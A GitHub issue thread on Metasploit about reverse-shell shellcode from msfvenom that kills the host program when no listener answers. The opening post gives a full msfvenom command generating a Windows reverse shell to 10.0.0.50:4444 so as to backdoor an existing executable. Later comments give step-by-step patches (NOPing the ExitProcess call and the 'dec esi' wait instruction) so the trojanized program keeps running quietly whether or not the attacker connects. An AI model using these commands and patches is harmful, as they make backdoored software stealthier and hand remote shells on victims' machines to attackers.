### ISSUE TITLE
MSFVenom Shellcode Exit Behavior

### ISSUE THREAD

**Issue by 0xM** [rapid7/metasploit-framework#8481]
## Steps to reproduce
I am trying to create a reverse shell payload  `msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.50 LPORT=4444 -f hex` to backdoor an existing PE.

Victim OS: Vista Home Premium SP 1

## Expected behavior
I am expecting the PE to run normally if the remote system "10.0.0.50" is not listening on port 4444. By this I mean, the application continue to execute instructions normally after the last instruction of the shellcode.

## Current behavior
The application terminates in the middle of the shellcode and does not hit the breakpoint I placed at the last instruction of the shellcode (which is always `CALL EBP`).

I have tried all EXITFUNC variations (seh, thread and none). unfortunately, none of them gave me the desired behavior and the application always terminates if the remote listener is not up.

When the application terminates, EIP is pointing to "ntdll.KiFastSystemCallRet" and the top of the stack is pointing to "ntdll.ZwTerminateProcess+0c"

Note: I confirmed that everything works fine if the remote system "10.0.0.50" is listening on port 4444. The reverse shell is spawned and once exited (by typing exit on the spawned shell), then the application continue to work normally. So the problem I am facing is only when the remote listener is not running.

### Metasploit version
Framework Version: 4.12.22-dev

### OS
Kali GNU/Linux Rolling

**Comment by wwebb-r7** [comment]
Tagging [this](https://github.com/rapid7/metasploit-framework/issues/5811) issue for my own benefit.  I'll try to reproduce and take a look in the near future on my end.

**Comment by bewniac** [comment]
I have the same issue 4.14.28-0kali1

**Comment by 0xbc** [comment]
Same issue here, exactly the same symptoms (`ExitProcess` always gets called if the connect-back isn't caught, regardless of the value of `EXITFUNC`). If I can do anything to assist debugging, please let me know.

(Kali Rolling, latest msf package install as of today.)

**Comment by phvin** [comment]
Anyone knows how to fix this?

**Comment by timwr** [comment]
Does this also occur with `msfvenom -p windows/shell/reverse_tcp LHOST=10.0.0.50 LPORT=4444 -f hex`? Notice windows/shell/reverse_tcp != windows/shell_reverse_tcp.

It would probably help to convert https://github.com/rapid7/metasploit-framework/blob/master/modules/payloads/singles/windows/shell_reverse_tcp.rb#L37 to use metasm.

**Comment by picheljitsu** [comment]
Really late, but this is because -1 is passed to WaitForSingleObject.  The assembly code output by MS can't be manually edited (unless you manually decode the instructions) since the instructions that make up that parameter and call to WaitForSingleObject are encoded when the shellcode is generated, then decoded in memory prior to executing.  

To replicate: Once binary is patched and ran, locate the MS shellcode instructions in a debugger, place a breakpoint at the return.  Continue execution and step through the code until you reach DEC ESI, PUSH ESI.  ESI will be 0 so decrementing sets it to -1 (all 0xF's).  Next call will be to WaitForSingleObject with that -1 as a parameter.

**Comment by picheljitsu** [comment]
This is caused by line 44 in https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_shell.asm

**Comment by picheljitsu** [comment]
You can edit shell_reverse_tcp.rb to manually nop out the dec instruction.  The shellcode in its non-encoded version is there.

**Comment by ke1satsu** [comment]
Hmm I'm not sure if that's really related picheljitsu, I just tried putting shellcode for shell_reverse_tcp in a PE-file and manually edited out the part handling WaitForSingleObject. The bug seems to still be there, if there is no handler/listener ready to catch the shell the process terminates as stated.

**Comment by SynAckPwn23** [comment]
Exactly the same issue, any solutions?

**Comment by socket8088** [comment]
I'm having the same problem. Anyone knows any workaround to solve this? Thank you

**Comment by xchg-ax-ax** [comment]
Ok ran into the same issue. Went through the sourcecode at : https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
The problem starts on line 58, if it can not connect to the socket it falls into this failure block. Simply NOP these lines out of your shellcode, adjust the -1 parameter for the WaitForSingleObject call as picheljitsu stated and and the application will start if there is no listener to connect to.

**Comment by supercano** [comment]
I found the solution by doing what @xchg-ax-ax and @picheljitsu  wrote before...

In order to avoid the shellcode quitting if the attack machine was not listening, i removed the "failure:" part from https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm  by looking with inmunity debuber the strings  f0b5a256  and replace this:

push 0x56A2B5F0        ; hardcoded to exitprocess for size
call ebp

with NOP's
with the last modiifcation, even if the attacker machine is not listening, the execution flaw is going to continue, however, if the attacker machine is listening, the attacker is going to receive the shell, and the flow execution will continue only if the attacker exits the shell.....

from file 
https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_shell.asm
its neccesary to avoid the ESI value to change to -1 by changing to NOP's the line 44 "dec esi    ; Decrement ESI down to -1 (INFINITE)", 

Now the flow execution is going to execute whether the attack machine is listening or not and if the shellcode is received, its not going to be necessary to exit to continue with the flow execution.

**Comment by francoataffarel** [comment]
> I found the solution by doing what @xchg-ax-ax and @picheljitsu wrote before...
> 
> In order to avoid the shellcode quitting if the attack machine was not listening, i removed the "failure:" part from https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm by looking with Immunity debugger the strings f0b5a256 and replace this:
> 
> push 0x56A2B5F0 ; hardcoded to exitprocess for size
> call ebp
> 
> with NOP's
> with the last modification, even if the attacker machine is not listening, the execution flaw is going to continue, however, if the attacker machine is listening, the attacker is going to receive the shell, and the flow execution will continue only if the attacker exits the shell.....
> 
> from file
> https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_shell.asm
> its neccesary to avoid the ESI value to change to -1 by changing to NOP's the line 44 "dec esi ; Decrement ESI down to -1 (INFINITE)",
> 
> Now the flow execution is going to execute whether the attack machine is listening or not and if the shellcode is received, its not going to be necessary to exit to continue with the flow execution.

there are same thing for a bind_tcp?
